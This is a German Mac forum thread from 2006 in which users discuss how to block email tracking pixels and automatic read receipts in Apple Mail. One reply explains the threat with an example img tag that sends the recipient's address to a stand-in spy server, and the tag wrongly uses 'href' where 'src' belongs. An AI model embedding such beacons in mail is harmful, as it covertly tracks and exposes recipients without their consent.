Sicherheit vor Spionage durch Emails

Dieses Thema im Forum "Sicherheit" wurde erstellt von spritebyte, 15.10.2006.

  1. spritebyte

    spritebyte Thread Starter MacUser Mitglied

    Beiträge:
    104
    Zustimmungen:
    16
    Mitglied seit:
    16.10.2004
    Hi.

    In dem Heise-Artikel (http://www.heise.de/newsticker/meldung/79483) wird über verschiedene Möglichkeiten gesprochen, mittels Emails Informationen über den Empfänger zu erhalten bzw. darüber wann er die Email liest oder nochmals öffnet, oder aber wann er sie weiterleitet.

    Welche Möglichkeiten habe ich, mich davor zu schützen? Bietet MAC OS bzw. Apple Mail Schutzmechanismen an?

    Oder sind andere Email-Clients besser geeignet, sich vor solchen Spionage-Versuchen zu schützen?

    spritebyte
     
  2. ybasket

    ybasket MacUser Mitglied

    Beiträge:
    325
    Zustimmungen:
    3
    Mitglied seit:
    17.01.2006
    Einstellungen->Darstellung->Nicht lokal gesicherte Bilder in HTML-Mails anzeigen ist bei Mail.app schon ein echter Anfang, da keine Bilder mehr nachgeladen werden können. Ein Spion könnte dir sonst eine Mail schreiben, die folgendes enthält:
    <img href="server.spam/spion-bild.php?info=[z.B. du@deinprovider.de]" />
    Das PHP-Skript speichert die Information (bei Spam deine Addresse, bei aktiviertem JavaScript z.B. deine Monitor-Auflösung) und schickt dir eine 1x1 Pixel große, transparente GIF-Grafik.
     
  3. McTenner

    McTenner MacUser Mitglied

    Beiträge:
    438
    Zustimmungen:
    15
    Mitglied seit:
    04.12.2005
    Ich habe mal gelesen, dass Mail automatisch ohne Nachfrage eine angeforderte Lesebestätigung verschickt.
    Das konnte man auch abstellen. Weiß jemand wie das geht?
     
  4. cpx

    cpx MacUser Mitglied

    Beiträge:
    1.154
    Zustimmungen:
    27
    Mitglied seit:
    14.01.2005
    Das funktioniert aber nicht mit der speziellen c´t Mail ! (Anfordern). ;)
     
  5. Chicago Whistle

    Chicago Whistle MacUser Mitglied

    Beiträge:
    2.377
    Zustimmungen:
    14
    Mitglied seit:
    24.08.2005
    Die in dem Heise-Artikel angesprochenen Funktionalitäten von Patty-Mail greifen scheinbar auf html im Mail-Client zurück.
    Wenn man Mail die HTML-Darstellung verbieten könnte, wäre das schon ein großer Schritt. Ich habe das jetzt in den Mail Einstellungen nicht gefunden.
    Die Darstellung empfangener Mails läßt sich mit Aplfel ö und Apfel ä umschalten, wie man html Darstellung dauerhaft ausstellt weiß ich leider nicht.
     
Die Seite wird geladen...

Diese Seite empfehlen